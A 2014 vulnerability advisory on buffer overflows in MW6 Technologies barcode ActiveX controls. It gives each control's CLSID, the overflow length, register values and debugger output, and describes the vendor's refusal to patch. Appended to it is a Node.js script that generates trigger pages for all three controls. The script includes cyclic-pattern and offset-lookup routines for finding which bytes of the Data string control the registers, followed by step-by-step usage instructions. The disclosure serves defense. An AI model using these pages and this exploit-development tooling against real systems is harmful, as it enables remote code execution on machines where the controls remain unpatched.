MW6 Technologies ActiveX buffer overflows and remote code execution

2014.01.22
Credit: Pedro Ribeiro
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Hi,

MW6 Technologies (http://www.mw6tech.com/) is a manufacturer of barcoding software. Among their products they have ActiveX controls to process barcodes and labels. I discovered that their ActiveX controls have multiple buffer overflows, some of them leading to code execution. I informed them in November last year, and they responded to me basically saying that they don't care and won't fix it. I then asked CERT to try to persuade them, but even with CERT asking them they still didn't care. CERT released the vulnerability details yesterday at http://www.kb.cert.org/vuls/id/219470.

In this post I will explain a bit better what the problem is and how it can be exploited. The excerpt below is from the original advisory sent to MW6.

===========================================================================

Problem: The Data parameter is subject to a buffer overflow DEFINITELY leading to arbitrary code execution.

COM Object - {2355C601-37D1-42B4-BEB1-03C773298DC8}
MW6MaxiCode Class
File Description : MaxiCode ActiveX
File Version : 4, 0, 0, 1

To trigger the overflow enter a string larger than 4000 characters. In the PoC (mw6maxicode.html) you see that Internet Explorer crashes when trying to copy 42424242 to a register. By disassembling near the crash location, you can see that both EAX and ECX can be manipulated, with the values 41414141 and 42424242 respectively. These are later used in write operations, leading to an arbitrary 4-byte write.

===========================================================================

Problem: The Data parameter is subject to a buffer overflow DEFINITELY leading to arbitrary code execution.

COM Object - {F359732D-D020-40ED-83FF-F381EFE36B54}
MW6Aztec Class
File Description : Aztec ActiveX
File Version : 4, 0, 0, 1

To trigger the overflow enter a string larger than 9000 characters. The attached PoC (mw6maztec.html) crashes when trying to read from address 41414141. Further investigation shows that the value of EAX, 030e20d0, is written into an arbitrary memory location, and this EAX value points to the Data buffer.

===========================================================================

Problem: The Data parameter is subject to a buffer overflow PROBABLY leading to arbitrary code execution.

COM Object - {DE7DA0B5-7D7B-4CEA-8739-65CF600D511E}
MW6DataMatrix Class
File Description : DataMatrix ActiveX
File Version : 4, 0, 0, 1

To trigger the overflow enter a string larger than 10000 characters. This one I'm not 100% sure if I can control. The attached PoC (mw6datamatrix.html) dies with the following message:

DATAMA_1!DllUnregisterServer+0xac5f:
02fbbcea 668984566c5c0100 mov word ptr [esi+edx*2+15C6Ch],ax ds:0023:03006000=????

The !exploitable windbg plugin says:

Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at DATAMA_1!DllUnregisterServer+0x000000000000ac5f (Hash=0x3a50672d.0x5d486a2f)
User mode write access violations that are not near NULL are exploitable.

So the buffer overflow might be exploitable by someone willing to spend more time on this.

===========================================================================

All of these PoC were tested in Internet Explorer 8 on Windows XP SP3. The PoC can be obtained from my repository at https://github.com/pedrib/PoC in the folder "mw6".

Regards,
Pedro Ribeiro
Director of Research
Agile Information Security
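As an added example, not the author's PoC files from the pedrib/PoC repository, the Node.js script below generates a trigger page for each of the three controls listed above and adds the step the advisory's plain "A"/"B" fill cannot give you: mapping a register value seen at the crash back to an offset inside the overlong Data string. The CLSIDs and the string lengths come from the advisory; the cyclic pattern, the `target.Data` property assignment and the page layout are assumptions about how the control is driven from a page.

```javascript
// Added example (not the author's PoC): trigger-page generator for the three
// MW6 controls named in the advisory. CLSIDs and trigger lengths are from the
// advisory; the cyclic pattern, "target.Data = ..." and the page layout are
// assumptions.

// Advisory data: control name -> CLSID and the length the text says overflows it.
const CONTROLS = {
  maxicode:   { clsid: "2355C601-37D1-42B4-BEB1-03C773298DC8", triggerLen: 4000 },
  aztec:      { clsid: "F359732D-D020-40ED-83FF-F381EFE36B54", triggerLen: 9000 },
  datamatrix: { clsid: "DE7DA0B5-7D7B-4CEA-8739-65CF600D511E", triggerLen: 10000 },
};

// Cyclic pattern in the style of Metasploit's pattern_create ("Aa0Aa1Aa2...").
// Every 4-byte window is unique, so a register value seen in the debugger maps
// back to exactly one offset in the Data string. Maximum length is 20280.
function patternCreate(length) {
  if (length > 20280) throw new Error("pattern exhausted at 20280 characters");
  let out = "";
  for (let u = 0; u < 26; u++) {
    for (let l = 0; l < 26; l++) {
      for (let d = 0; d < 10; d++) {
        out += String.fromCharCode(65 + u, 97 + l, 48 + d);
        if (out.length >= length) return out.slice(0, length);
      }
    }
  }
  return out.slice(0, length);
}

// Turn a 32-bit register value as printed by the debugger (e.g. 0x41316141)
// into the four ASCII bytes as they lay in memory on little-endian x86, then
// locate them in the pattern. Returns -1 when the value did not come from the
// pattern (e.g. 41414141 from a plain "A" fill, as in the advisory).
function patternOffset(regValue, length) {
  let v = regValue >>> 0;
  let needle = "";
  for (let i = 0; i < 4; i++) {
    needle += String.fromCharCode(v & 0xff);
    v >>>= 8;
  }
  return patternCreate(length).indexOf(needle);
}

// Build the page that instantiates the control by CLSID and assigns the
// overlong string to its Data property. Length defaults to one character past
// the advisory's threshold. The generated page itself is plain ES3 for IE8.
function buildPoc(name, length) {
  const ctl = CONTROLS[name];
  if (!ctl) throw new Error("unknown control: " + name);
  const len = length === undefined ? ctl.triggerLen + 1 : length;
  const data = patternCreate(len);  // alphanumeric only, so no escaping needed
  return [
    "<html><body>",
    `<object classid="clsid:${ctl.clsid}" id="target"></object>`,
    '<script type="text/javascript">',
    `  var data = "${data}";`,
    "  target.Data = data;  // overlong Data string triggers the overflow",
    "</script>",
    "</body></html>",
  ].join("\n");
}

// Stand-alone run: report page sizes and show the offset lookup on a
// hypothetical crash value (0x41316141 is the pattern's bytes at offset 3).
if (typeof require !== "undefined" && require.main === module) {
  for (const name of Object.keys(CONTROLS)) {
    console.log(`mw6${name}.html: ${buildPoc(name).length} bytes`);
  }
  console.log("offset of 0x41316141 in a 4001-byte pattern:", patternOffset(0x41316141, 4001));
}

if (typeof module !== "undefined") {
  module.exports = { CONTROLS, patternCreate, patternOffset, buildPoc };
}
```

Save each `buildPoc(name)` result as an .html file and open it in the target IE/Windows XP SP3 setup under a debugger; then feed the EAX/ECX value from the access violation to `patternOffset` with the same length you generated, and the result is the position in Data that controls that register. A result of -1 means the value was not pattern bytes (for example a pointer such as the 030e20d0 noted for the Aztec control), which is itself useful to know before building anything on it.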

References:

http://seclists.org/fulldisclosure/2014/Jan/137
http://www.kb.cert.org/vuls/id/219470

